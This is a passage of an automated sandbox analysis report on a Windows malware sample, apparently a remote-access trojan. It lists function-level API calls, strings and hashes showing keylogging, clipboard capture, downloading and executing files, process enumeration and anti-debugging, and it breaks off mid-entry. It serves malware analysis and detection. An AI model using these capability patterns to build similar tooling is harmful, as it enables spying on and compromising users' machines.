                        Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                          • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                          • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                          • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                          • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                        • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-1420736420
                        • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                        • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                        • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                        • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                        Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                        • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: ACP$OCP
                        • API String ID: 2299586839-711371036
                        • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                        • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                        • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                        • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                        Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                        • wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                        • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                        • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                        • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                        Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                        • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                        • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                        • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                        • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                        • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                        • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                        Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 004087A5
                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                        • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                        • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                        • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                        Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                        • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                        • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                        • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                        • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID:
                        • API String ID: 745075371-0
                        • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                        • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                        • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                        • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                        Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 0040784D
                        • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                        • String ID:
                        • API String ID: 1771804793-0
                        • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                        • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                        • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                        • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                        Function 0040E2E7 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                        • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                          • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                          • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 1735047541-0
                        • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                        • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                        • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                        • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                        Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: A%E$A%E
                        • API String ID: 0-137320553
                        • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                        • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                        • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                        • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                        Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                          • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                          • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                          • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                        • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                        • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                        • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                        Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                        • _wcschr.LIBVCRUNTIME ref: 0044F02A
                        • _wcschr.LIBVCRUNTIME ref: 0044F038
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID:
                        • API String ID: 4212172061-0
                        • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                        • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                        • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                        • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                        Function 004063C6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222filenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: open
                        • API String ID: 2825088817-2758837156
                        • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                        • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                        • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                        • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                        Function 0044F2A3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                        • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                        • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                        • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                        Function 004398AC Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 004399A4
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                        • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                        • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                        • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                        Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                        • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                        • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                        • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                        Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 0040A65D
                        • GetClipboardData.USER32(0000000D), ref: 0040A669
                        • CloseClipboard.USER32 ref: 0040A671
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseDataOpen
                        • String ID:
                        • API String ID: 2058664381-0
                        • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                        • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                        • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                        • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                        Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-3916222277
                        • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                        • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                        • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                        • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                        Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                        • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                        • Opcode Fuzzy Hash: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                        • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                        Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                        • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                        • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                        • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                        Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID:
                        • API String ID: 4113138495-0
                        • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                        • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                        • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                        • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                        Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                        • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                        • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                        • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                        Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
